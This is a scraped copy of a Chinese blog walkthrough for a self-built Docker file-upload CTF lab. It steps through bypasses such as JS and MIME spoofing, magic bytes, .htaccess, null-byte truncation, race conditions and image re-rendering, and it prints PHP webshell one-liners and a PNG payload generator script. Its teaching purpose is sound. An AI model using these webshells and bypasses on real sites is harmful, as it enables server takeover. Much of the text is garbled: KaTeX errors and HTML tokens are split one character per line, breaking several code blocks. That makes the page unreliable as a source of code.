当先锋百科网

首页 1 2 3 4 5 6 7

https://www.sqlsec.com/2020/10/upload.html#toc-heading-1
或者
https://xz.aliyun.com/t/8435

直接使用别人的靶场总感觉不太好,那么就干脆自己写一个自己的文件上传靶场吧。正好博客之前也没有单独总结过文件上传的知识点,那么就顺便水一篇文章,岂不是一举两得。当然关于文件上传 upload-labs 总结的比较全面了,非强迫症患者建议直接去刷 upload-labs ,本文很多核心代码也都是直接用了 upload-labs 的轮子的…

前言

国光有一台 XPS15 里面运行着 macOS 和 Ubuntu 双系统,其中 XPS 主要系统就是 Ubuntu,国光在 Ubuntu 里面搭建了一个离线的 CTFd 里面还运行着 Docker、宝塔。基本上很多服务都可以在我的 XPS 上运行起来了,出去讲课的时候会带着我的 XPS 和 MBP 一起,离线靶场一开美滋滋,更关键的是往自己的靶场里面填充题目有一种养成游戏的感觉,很有成就感。

又因为最近出书的问题,需要一个自己的靶场,那么就顺便开发一个自己的文件上传靶场吧,从简单到复杂根据自己的上课节奏来,开发完顺便放到 CTFd 中。本文写详细一点的话就可以做我自己靶场的官方 WP 了,也方便学生们课后自己消化吸收。当然如果也可以帮助到看到本文的其他朋友的话,这篇文章也变得就更加有意义了。

目前靶场一共有 13 题,感觉基本上的上传姿势点都覆盖了,除了 Windows 下的 点、空格、::$DATA 特性没有覆盖到,其他的感(这个偷懒理由针不戳!)

靶场部署

DockerHub 项目地址https://hub.docker.com/r/sqlsec/ggctf-upload

Github 项目地址https://github.com/sqlsec/upload-labs-docker

bash
# 进入项目文件夹
cd upload-labs-docker

# 一键部署运行
docker-compose up -d

默认 13 个关卡运行的端口为 30001-30013 这 13 个端口上,如果要自定义端口信息的话,自行修改 docker-compose.yml 文件即可。

一共 13 个 Docker 容器,可能第一次部署需要一定的时间,有点硬伤, 耐心等待一下即可

本项目的优势

  1. Docker 一键部署很方便,可以灵活的导入到 CTFd 中
  2. 题目更侧重于教学,注重对选手解题的引导,而不是一味地刁难选手
  3. 配套保姆级 WP,妈妈再也不用担心不会解题啦
  4. 前端界面在同行的衬托下没有那么丑

JS

国光认为好的题目就应该让选手在做题的时候给予线索引导,让他们可以从题目中真正学到些什么。

如何判断是否是前端验证呢?首先抓包监听,如果上传文件的时候还没有抓取到数据包,但是浏览器就提示文件类型不正确的话,那么这个多半就是前端校验了:

解法一:抓包

因为是前段验证的问题,可以直接将 shell.php 重命名为 shell.png 上传抓包的时候再将文件名修改为 shell.php 即可绕过前段限制,成功上传 webshell。

解法二:禁用 JS

因为 JS 来校验文件后缀的原因,所以可以直接在浏览器上禁用 JS 这样就可以直接上传文件了。Chrome 内核的浏览器在审查元素的状态下可以找到 Settings 选项,然后找到 「Debugger」 选项下面直接勾选 「Disable JavaScript」即可。

解法三:调试 JS

这种解法就类似于孔乙己中的茴香豆的 「茴」有几种写法?,纯粹就是为了炫技,但是并不实用,那么国光下面就简单说下调试 JS 的过程吧。

首先审查元素下下断点:

单行单步调试,找到 whitelist 变量,双击元素然后直接修改数组元素的值 :

放掉数据包,之前的 shell.php 可直接上传成功:

成功拿到根目录下的 flag:

MIME

这样下去感觉上课都不需要 PPT 了,关键姿势点都直接贴在了题目中了:

因为提示了 MIME 类型校验,所以抓取上传的数据包然后直接修改 Content-Type 类型为:image/png 等合法的类型即可:

文件头

本题配图中里面包含了 GIF89a 已经很明显了,答案就在题目中:

本题校验了图片的文件头也就是校验图片内容的,这个时候使用一个标准的图马是可以成功绕过的,由于国光的这个代码只校验了前面几个字节,所以直接写 GIF89a 即可成功绕过:

缺陷的代码 - 1

本题的图片上的第 2 行代码是一个有缺陷的代码,黑名单关键词替换为空的操作是一种不安全的写法:

因为代码开发者的错误写法,这种情况下可以直接使用嵌套后缀绕过:

缺陷的代码 - 2

本地属于理论上漏洞,因为题目环境是 Docker 容器运行的 Linux 系统,所以本题国光修改成了 Windows 的特性

同理图片提示中的第 2 行代码也是有缺陷的,可以仅用了 str_replace 替换,这样很容易就被大小写绕过,因为 Windows 环境下不区分大小写,所以就可以让 .PHp 当做 .php 来解析了,但是 Linux 下这种大小写如果的话完全没作用,所以本题是国光自己造的漏洞,用来伪造 Windows 环境下的大小写不区分的情况:

黑名单

本题同样题目的配图中暗示已经比较明显了,默认情况下 Apache 把 phtml、pht、php、php3、php4、php5 解析为 PHP:

那么这里 Fuzz 一下,发现这些稍微冷门的后缀都可以直接绕过:

解析规则

本题的暗示也已经很明显了,只要选手查询 htaccess 怎么解析的话,就可以很顺利的解题:

因为题目是考擦 htaccess 这个上传知识点,所以先准备一个解析规则:

bash
$ cat .htaccess
AddType application/x-httpd-php .png

然后先上传这个 .htaccess 文件到服务器的 upload 目录下:

这表示将 upload 目录下的所有 png 图片都当做 php 来解析,然后再上传一个 shell.png 即可:

此时这个 shell.png 就已经被当做 PHP 解析了:

古老的漏洞 - 1

本题依然在题目中科普了 00 截断是啥,以及 00 截断的利用条件:

00 截断多配合路径来截断,我们来抓包看看应该是存在路径信息的,然后直接在路径后面使用 %00 来截断一下就可以成功绕过,为啥 %00 直接就可以绕过了呢?这是因为路径信息是从 GET 方式传递个后端的,这样默认会进行一次 URL 解码,%00 解码后就是空字节:

这样保存的文件名就是这样的效果:

bash

因为 %00 起到截断的作用,所以最终会在 upload 目录下面生成 new.php 的 webshell

古老的漏洞 - 2

国光这一题偷懒了,没有换题目外观,不过选手们抓包就会发现这是一个 POST 型的 00 截断:

既然是 POST 型 00 截断那么就直接抓包吧,需要在 BP 里面写一个 %00 然后再 URL 手动解码一下:

条件竞争

本题是一个条件竞争漏洞,也在题目中给了关键的功能代码贴图,以及给了解题思路了:

条件竞争的话稍微和正常的上传姿势不一样,先把题目中给的 webshell 信息复制出来备用:

php
<?php fputs(fopen(‘xiao.php’,‘w’),’<?php eval(KaTeX parse error: Expected 'EOF', got '&' at position 15: _REQUEST[1]);?&̲gt;'</span><spa…temp_file, 
         
          
           
            
             i
            
            
             m
            
            
             
              g
             
             
              p
             
            
            
             a
            
            
             t
            
            
             h
            
            
             <
            
            
             /
            
            
             s
            
            
             p
            
            
             a
            
            
             n
            
            
             >
            
            
             <
            
            
             s
            
            
             p
            
            
             a
            
            
             n
            
            
             c
            
            
             l
            
            
             a
            
            
             s
            
            
             s
            
            
             =
            
            
             "
            
            
             t
            
            
             o
            
            
             k
            
            
             e
            
            
             n
            
            
             p
            
            
             u
            
            
             n
            
            
             c
            
            
             t
            
            
             u
            
            
             a
            
            
             t
            
            
             i
            
            
             o
            
            
             n
            
            
             "
            
            
             >
            
            
             )
            
            
             <
            
            
             /
            
            
             s
            
            
             p
            
            
             a
            
            
             n
            
            
             >
            
            
             <
            
            
             s
            
            
             p
            
            
             a
            
            
             n
            
            
             a
            
            
             r
            
            
             i
            
            
             a
            
            
             −
            
            
             h
            
            
             i
            
            
             d
            
            
             d
            
            
             e
            
            
             n
            
            
             =
            
            
             "
            
            
             t
            
            
             r
            
            
             u
            
            
             e
            
            
             "
            
            
             c
            
            
             l
            
            
             a
            
            
             s
            
            
             s
            
            
             =
            
            
             "
            
            
             l
            
            
             i
            
            
             n
            
            
             e
            
            
             −
            
            
             n
            
            
             u
            
            
             m
            
            
             b
            
            
             e
            
            
             r
            
            
             s
            
            
             −
            
            
             r
            
            
             o
            
            
             w
            
            
             s
            
            
             "
            
            
             >
            
            
             <
            
            
             s
            
            
             p
            
            
             a
            
            
             n
            
            
             >
            
            
             <
            
            
             /
            
            
             s
            
            
             p
            
            
             a
            
            
             n
            
            
             >
            
            
             <
            
            
             /
            
            
             s
            
            
             p
            
            
             a
            
            
             n
            
            
             >
            
            
             <
            
            
             /
            
            
             c
            
            
             o
            
            
             d
            
            
             e
            
            
             >
            
            
             <
            
            
             /
            
            
             p
            
            
             r
            
            
             e
            
            
             >
            
            
             <
            
            
             /
            
            
             d
            
            
             i
            
            
             v
            
            
             >
            
            
             <
            
            
             p
            
            
             >
            
            
             当
            
            
             <
            
            
             c
            
            
             o
            
            
             d
            
            
             e
            
            
             >
            
           
           
            img_path</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre></div><p>当 <code>
           
          
         imgpath</span><spanclass="tokenpunctuation">)</span><spanariahidden="true"class="linenumbersrows"><span></span></span></code></pre></div><p><code>img_path 可控的时候,还会忽略掉 KaTeX parse error: Expected 'EOF', got '#' at position 462: …g-17"><a href="#̲二次渲染" target="_blank" rel="external nofollow"  class="he…_REQUEST[1]);?>’ -o gg_shell.png old.png

生成新的 gg_shell.png 图片如下:

这个图片是带 payload 的:

然后上传到目标网站上面渲染一下再导出:

来检测一下我们的 payload 是否还存在了:

哎貌似不对劲:

这个字符串被渲染后貌似是顺序有点奇怪。这里国光踩了很多坑,查了很多资料网上都没有好的解决方案,最后国光将这个被目标网站渲染后的图片再上传渲染,下面是渲染后的图片:

赶紧来查看一下里面是否包含图马信息:

阿这!居然成功了,真的是功夫不负有心人呐,不枉国光我周末大半夜的在公司加班写的这篇文章了!!!泪目

写入IDAT数据块

PNG 也是可以写入 IDAT 数据来绕过渲染的,由于快 23.00 了国光没有多余的时间研究里面细节了,这里直接引用了先知里面提供的一个脚本:

php
<?php
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
0x66, 0x44, 0x50, 0x33);

$img = imagecreatetruecolor(32, 32);

for ( y < / s p a n > < s p a n c l a s s = " t o k e n o p e r a t o r " > = < / s p a n > < s p a n c l a s s = " t o k e n n u m b e r " > 0 < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > ; < / s p a n > < s p a n c l a s s = " t o k e n v a r i a b l e " > y</span> <span class="token operator">=</span> <span class="token number">0</span><span class="token punctuation">;</span> <span class="token variable"> y</span><spanclass="tokenoperator">=</span><spanclass="tokennumber">0</span><spanclass="tokenpunctuation">;</span><spanclass="tokenvariable">y < sizeof( p < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > ) < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > ; < / s p a n > < s p a n c l a s s = " t o k e n v a r i a b l e " > p</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token variable"> p</span><spanclass="tokenpunctuation">)</span><spanclass="tokenpunctuation">;</span><spanclass="tokenvariable">y += 3) {
r < / s p a n > < s p a n c l a s s = " t o k e n o p e r a t o r " > = < / s p a n > < s p a n c l a s s = " t o k e n v a r i a b l e " > r</span> <span class="token operator">=</span> <span class="token variable"> r</span><spanclass="tokenoperator">=</span><spanclass="tokenvariable">p[ y < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > ] < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > ; < / s p a n > < s p a n c l a s s = " t o k e n v a r i a b l e " > y</span><span class="token punctuation">]</span><span class="token punctuation">;</span> <span class="token variable"> y</span><spanclass="tokenpunctuation">]</span><spanclass="tokenpunctuation">;</span><spanclass="tokenvariable">g = p < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > [ < / s p a n > < s p a n c l a s s = " t o k e n v a r i a b l e " > p</span><span class="token punctuation">[</span><span class="token variable"> p</span><spanclass="tokenpunctuation">[</span><spanclass="tokenvariable">y+1];
b < / s p a n > < s p a n c l a s s = " t o k e n o p e r a t o r " > = < / s p a n > < s p a n c l a s s = " t o k e n v a r i a b l e " > b</span> <span class="token operator">=</span> <span class="token variable"> b</span><spanclass="tokenoperator">=</span><spanclass="tokenvariable">p[ y < / s p a n > < s p a n c l a s s = " t o k e n o p e r a t o r " > + < / s p a n > < s p a n c l a s s = " t o k e n n u m b e r " > 2 < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > ] < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > ; < / s p a n > < s p a n c l a s s = " t o k e n v a r i a b l e " > y</span><span class="token operator">+</span><span class="token number">2</span><span class="token punctuation">]</span><span class="token punctuation">;</span> <span class="token variable"> y</span><spanclass="tokenoperator">+</span><spanclass="tokennumber">2</span><spanclass="tokenpunctuation">]</span><spanclass="tokenpunctuation">;</span><spanclass="tokenvariable">color = imagecolorallocate( i m g < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > , < / s p a n > < s p a n c l a s s = " t o k e n v a r i a b l e " > img</span><span class="token punctuation">,</span> <span class="token variable"> img</span><spanclass="tokenpunctuation">,</span><spanclass="tokenvariable">r, g < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > , < / s p a n > < s p a n c l a s s = " t o k e n v a r i a b l e " > g</span><span class="token punctuation">,</span> <span class="token variable"> g</span><spanclass="tokenpunctuation">,</span><spanclass="tokenvariable">b);
imagesetpixel( i m g < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > , < / s p a n > < s p a n c l a s s = " t o k e n f u n c t i o n " > r o u n d < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > ( < / s p a n > < s p a n c l a s s = " t o k e n v a r i a b l e " > img</span><span class="token punctuation">,</span> <span class="token function">round</span><span class="token punctuation">(</span><span class="token variable"> img</span><spanclass="tokenpunctuation">,</span><spanclass="tokenfunction">round</span><spanclass="tokenpunctuation">(</span><spanclass="tokenvariable">y / 3), 0, $color);
}

imagepng(KaTeX parse error: Expected 'EOF', got '&' at position 241: …er important">?&̲gt;</span></spa…miniPayload = ‘<?php phpinfo();?>’;

然后运行脚本插入 payload:

bash
$ php jpg_payload.php 122728342.jpg
Success!

生成的新图片为:

然后上传到目标网站上面渲染一下再导出:

那么来查看一下最终这个 JPG 里面是否带有 payload 信息:

无疑写 phpinfo() 是很容易成功的,但是 phpinfo() 并无实质性危害,我们需要插入真正的 webshell 才可以:

php

这里非常玄学,在国光经历了不知道多少次失败后,才成功将上面的 payload 完整插入

这个图马被 imagecreatefromjpeg 渲染后如下:

查看一下 payload 是否存在:

完美,尝试直接文件包含来执行攻击语句试试看:

JPG 坑点总结

  1. 需要被 imagecreatefromjpeg 渲染或再用工具
  2. 图片找的稍微大一点 成功率更高
  3. Payload 语句越短成功率越高
  4. 一张图片不行就换一张 不要死磕
  5. 国光补充:貌似白色的图片成功率也比较高
  6. <?php G E T [ 0 ] ( _GET[0]( GET[0](_POST[1]);?> 这种payload 成功率很高

代码审计

代码审计这一题如果可以动态调试的话,那么理解起来就会比较简单:

这个题目是直接 copy Upload-labs 里面的最后一关,这个貌似还是后面新增的题目,下面是核心代码:

php

        
         
          
           
            i
           
           
            
             s
            
            
             u
            
           
           
            p
           
           
            l
           
           
            o
           
           
            a
           
           
            d
           
           
            <
           
           
            /
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            >
           
           
            <
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            c
           
           
            l
           
           
            a
           
           
            s
           
           
            s
           
           
            =
           
           
            "
           
           
            t
           
           
            o
           
           
            k
           
           
            e
           
           
            n
           
           
            o
           
           
            p
           
           
            e
           
           
            r
           
           
            a
           
           
            t
           
           
            o
           
           
            r
           
           
            "
           
           
            >
           
           
            =
           
           
            <
           
           
            /
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            >
           
           
            <
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            c
           
           
            l
           
           
            a
           
           
            s
           
           
            s
           
           
            =
           
           
            "
           
           
            t
           
           
            o
           
           
            k
           
           
            e
           
           
            n
           
           
            c
           
           
            o
           
           
            n
           
           
            s
           
           
            t
           
           
            a
           
           
            n
           
           
            t
           
           
            b
           
           
            o
           
           
            o
           
           
            l
           
           
            e
           
           
            a
           
           
            n
           
           
            "
           
           
            >
           
           
            f
           
           
            a
           
           
            l
           
           
            s
           
           
            e
           
           
            <
           
           
            /
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            >
           
           
            <
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            c
           
           
            l
           
           
            a
           
           
            s
           
           
            s
           
           
            =
           
           
            "
           
           
            t
           
           
            o
           
           
            k
           
           
            e
           
           
            n
           
           
            p
           
           
            u
           
           
            n
           
           
            c
           
           
            t
           
           
            u
           
           
            a
           
           
            t
           
           
            i
           
           
            o
           
           
            n
           
           
            "
           
           
            >
           
           
            ;
           
           
            <
           
           
            /
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            >
           
           
            <
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            c
           
           
            l
           
           
            a
           
           
            s
           
           
            s
           
           
            =
           
           
            "
           
           
            t
           
           
            o
           
           
            k
           
           
            e
           
           
            n
           
           
            v
           
           
            a
           
           
            r
           
           
            i
           
           
            a
           
           
            b
           
           
            l
           
           
            e
           
           
            "
           
           
            >
           
          
          
           is_upload</span> <span class="token operator">=</span> <span class="token constant boolean">false</span><span class="token punctuation">;</span> <span class="token variable">
          
         
        isupload</span><spanclass="tokenoperator">=</span><spanclass="tokenconstantboolean">false</span><spanclass="tokenpunctuation">;</span><spanclass="tokenvariable">msg = null;
if(!empty(KaTeX parse error: Expected '}', got 'EOF' at end of input: …oken variable">allow_type = array(‘image/jpeg’,‘image/png’,‘image/gif’);
if(!in_array( F I L E S < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > [ < / s p a n > < s p a n c l a s s = " t o k e n s t r i n g s i n g l e − q u o t e d − s t r i n g " > ′ u p l o a d f i l e ′ < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > ] < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > [ < / s p a n > < s p a n c l a s s = " t o k e n s t r i n g s i n g l e − q u o t e d − s t r i n g " > ′ t y p e ′ < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > ] < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > , < / s p a n > < s p a n c l a s s = " t o k e n v a r i a b l e " > _FILES</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'upload_file'</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'type'</span><span class="token punctuation">]</span><span class="token punctuation">,</span><span class="token variable"> FILES</span><spanclass="tokenpunctuation">[</span><spanclass="tokenstringsinglequotedstring">uploadfile</span><spanclass="tokenpunctuation">]</span><spanclass="tokenpunctuation">[</span><spanclass="tokenstringsinglequotedstring">type</span><spanclass="tokenpunctuation">]</span><spanclass="tokenpunctuation">,</span><spanclass="tokenvariable">allow_type)){
KaTeX parse error: Expected 'EOF', got '}' at position 194: …n punctuation">}̲</span><span cl…file = empty( P O S T < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > [ < / s p a n > < s p a n c l a s s = " t o k e n s t r i n g s i n g l e − q u o t e d − s t r i n g " > ′ s a v e n a m e ′ < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > ] < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > ) < / s p a n > < s p a n c l a s s = " t o k e n o p e r a t o r " > ? < / s p a n > < s p a n c l a s s = " t o k e n v a r i a b l e " > _POST</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'save_name'</span><span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token operator">?</span> <span class="token variable"> POST</span><spanclass="tokenpunctuation">[</span><spanclass="tokenstringsinglequotedstring">savename</span><spanclass="tokenpunctuation">]</span><spanclass="tokenpunctuation">)</span><spanclass="tokenoperator">?</span><spanclass="tokenvariable">_FILES[‘upload_file’][‘name’] : P O S T < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > [ < / s p a n > < s p a n c l a s s = " t o k e n s t r i n g s i n g l e − q u o t e d − s t r i n g " > ′ s a v e n a m e ′ < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > ] < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > ; < / s p a n > < s p a n c l a s s = " t o k e n k e y w o r d " > i f < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > ( < / s p a n > < s p a n c l a s s = " t o k e n o p e r a t o r " > ! < / s p a n > < s p a n c l a s s = " t o k e n f u n c t i o n " > i s a r r a y < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > ( < / s p a n > < s p a n c l a s s = " t o k e n v a r i a b l e " > _POST</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'save_name'</span><span class="token punctuation">]</span><span class="token punctuation">;</span> <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span><span class="token function">is_array</span><span class="token punctuation">(</span><span class="token variable"> POST</span><spanclass="tokenpunctuation">[</span><spanclass="tokenstringsinglequotedstring">savename</span><spanclass="tokenpunctuation">]</span><spanclass="tokenpunctuation">;</span><spanclass="tokenkeyword">if</span><spanclass="tokenpunctuation">(</span><spanclass="tokenoperator">!</span><spanclass="tokenfunction">isarray</span><spanclass="tokenpunctuation">(</span><spanclass="tokenvariable">file)) {
f i l e < / s p a n > < s p a n c l a s s = " t o k e n o p e r a t o r " > = < / s p a n > < s p a n c l a s s = " t o k e n f u n c t i o n " > e x p l o d e < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > ( < / s p a n > < s p a n c l a s s = " t o k e n s t r i n g s i n g l e − q u o t e d − s t r i n g " > ′ . ′ < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > , < / s p a n > < s p a n c l a s s = " t o k e n f u n c t i o n " > s t r t o l o w e r < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > ( < / s p a n > < s p a n c l a s s = " t o k e n v a r i a b l e " > file</span> <span class="token operator">=</span> <span class="token function">explode</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'.'</span><span class="token punctuation">,</span> <span class="token function">strtolower</span><span class="token punctuation">(</span><span class="token variable"> file</span><spanclass="tokenoperator">=</span><spanclass="tokenfunction">explode</span><spanclass="tokenpunctuation">(</span><spanclass="tokenstringsinglequotedstring">.</span><spanclass="tokenpunctuation">,</span><spanclass="tokenfunction">strtolower</span><spanclass="tokenpunctuation">(</span><spanclass="tokenvariable">file));
}
    <span class="token variable">$ext</span> <span class="token operator">=</span> <span class="token function">end</span><span class="token punctuation">(</span><span class="token variable">$file</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token variable">$allow_suffix</span> <span class="token operator">=</span> <span class="token keyword">array</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'jpg'</span><span class="token punctuation">,</span><span class="token string single-quoted-string">'png'</span><span class="token punctuation">,</span><span class="token string single-quoted-string">'gif'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span><span class="token function">in_array</span><span class="token punctuation">(</span><span class="token variable">$ext</span><span class="token punctuation">,</span> <span class="token variable">$allow_suffix</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
        <span class="token variable">$msg</span> <span class="token operator">=</span> <span class="token string double-quoted-string">"禁止上传该后缀文件!"</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span><span class="token keyword">else</span><span class="token punctuation">{</span>
        <span class="token variable">$file_name</span> <span class="token operator">=</span> <span class="token function">reset</span><span class="token punctuation">(</span><span class="token variable">$file</span><span class="token punctuation">)</span> <span class="token operator">.</span> <span class="token string single-quoted-string">'.'</span> <span class="token operator">.</span> <span class="token variable">$file</span><span class="token punctuation">[</span><span class="token function">count</span><span class="token punctuation">(</span><span class="token variable">$file</span><span class="token punctuation">)</span> <span class="token operator">-</span> <span class="token number">1</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
        <span class="token variable">$temp_file</span> <span class="token operator">=</span> <span class="token variable">$_FILES</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'upload_file'</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'tmp_name'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
        <span class="token variable">$img_path</span> <span class="token operator">=</span> <span class="token constant">UPLOAD_PATH</span> <span class="token operator">.</span> <span class="token string single-quoted-string">'/'</span> <span class="token operator">.</span><span class="token variable">$file_name</span><span class="token punctuation">;</span>
        <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">move_uploaded_file</span><span class="token punctuation">(</span><span class="token variable">$temp_file</span><span class="token punctuation">,</span> <span class="token variable">$img_path</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
            <span class="token variable">$msg</span> <span class="token operator">=</span> <span class="token string double-quoted-string">"文件上传成功!"</span><span class="token punctuation">;</span>
            <span class="token variable">$is_upload</span> <span class="token operator">=</span> <span class="token constant boolean">true</span><span class="token punctuation">;</span>
        <span class="token punctuation">}</span> <span class="token keyword">else</span> <span class="token punctuation">{</span>
            <span class="token variable">$msg</span> <span class="token operator">=</span> <span class="token string double-quoted-string">"文件上传失败!"</span><span class="token punctuation">;</span>
        <span class="token punctuation">}</span>
    <span class="token punctuation">}</span>
<span class="token punctuation">}</span>

}else{
KaTeX parse error: Expected 'EOF', got '}' at position 190: …n punctuation">}̲</span><span ar…allow_type = array(‘image/jpeg’,‘image/png’,‘image/gif’);

if(!in_array( F I L E S < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > [ < / s p a n > < s p a n c l a s s = " t o k e n s t r i n g s i n g l e − q u o t e d − s t r i n g " > ′ u p l o a d f i l e ′ < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > ] < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > [ < / s p a n > < s p a n c l a s s = " t o k e n s t r i n g s i n g l e − q u o t e d − s t r i n g " > ′ t y p e ′ < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > ] < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > , < / s p a n > < s p a n c l a s s = " t o k e n v a r i a b l e " > _FILES</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'upload_file'</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'type'</span><span class="token punctuation">]</span><span class="token punctuation">,</span><span class="token variable"> FILES</span><spanclass="tokenpunctuation">[</span><spanclass="tokenstringsinglequotedstring">uploadfile</span><spanclass="tokenpunctuation">]</span><spanclass="tokenpunctuation">[</span><spanclass="tokenstringsinglequotedstring">type</span><spanclass="tokenpunctuation">]</span><spanclass="tokenpunctuation">,</span><spanclass="tokenvariable">allow_type)){
echo “<script>black();</script>”;
}

所以必须保证我们上传的表单 MIME 类型一定要符合标准。

接着对我们提交的 sava_name 的字符串进行处理,如果不是数组的话就以 .为分隔,打散为数组:

php

        
         
          
           
            f
           
           
            i
           
           
            l
           
           
            e
           
           
            <
           
           
            /
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            >
           
           
            <
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            c
           
           
            l
           
           
            a
           
           
            s
           
           
            s
           
           
            =
           
           
            "
           
           
            t
           
           
            o
           
           
            k
           
           
            e
           
           
            n
           
           
            o
           
           
            p
           
           
            e
           
           
            r
           
           
            a
           
           
            t
           
           
            o
           
           
            r
           
           
            "
           
           
            >
           
           
            =
           
           
            <
           
           
            /
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            >
           
           
            <
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            c
           
           
            l
           
           
            a
           
           
            s
           
           
            s
           
           
            =
           
           
            "
           
           
            t
           
           
            o
           
           
            k
           
           
            e
           
           
            n
           
           
            k
           
           
            e
           
           
            y
           
           
            w
           
           
            o
           
           
            r
           
           
            d
           
           
            "
           
           
            >
           
           
            e
           
           
            m
           
           
            p
           
           
            t
           
           
            y
           
           
            <
           
           
            /
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            >
           
           
            <
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            c
           
           
            l
           
           
            a
           
           
            s
           
           
            s
           
           
            =
           
           
            "
           
           
            t
           
           
            o
           
           
            k
           
           
            e
           
           
            n
           
           
            p
           
           
            u
           
           
            n
           
           
            c
           
           
            t
           
           
            u
           
           
            a
           
           
            t
           
           
            i
           
           
            o
           
           
            n
           
           
            "
           
           
            >
           
           
            (
           
           
            <
           
           
            /
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            >
           
           
            <
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
            c
           
           
            l
           
           
            a
           
           
            s
           
           
            s
           
           
            =
           
           
            "
           
           
            t
           
           
            o
           
           
            k
           
           
            e
           
           
            n
           
           
            v
           
           
            a
           
           
            r
           
           
            i
           
           
            a
           
           
            b
           
           
            l
           
           
            e
           
           
            "
           
           
            >
           
          
          
           file</span> <span class="token operator">=</span> <span class="token keyword">empty</span><span class="token punctuation">(</span><span class="token variable">
          
         
        file</span><spanclass="tokenoperator">=</span><spanclass="tokenkeyword">empty</span><spanclass="tokenpunctuation">(</span><spanclass="tokenvariable">_POST[‘save_name’]) ? 
        
         
          
           
            
            
             F
            
           
           
            I
           
           
            L
           
           
            E
           
           
            S
           
           
            <
           
           
            /
           
           
            s
           
           
            p
           
           
            a
           
           
            n
           
           
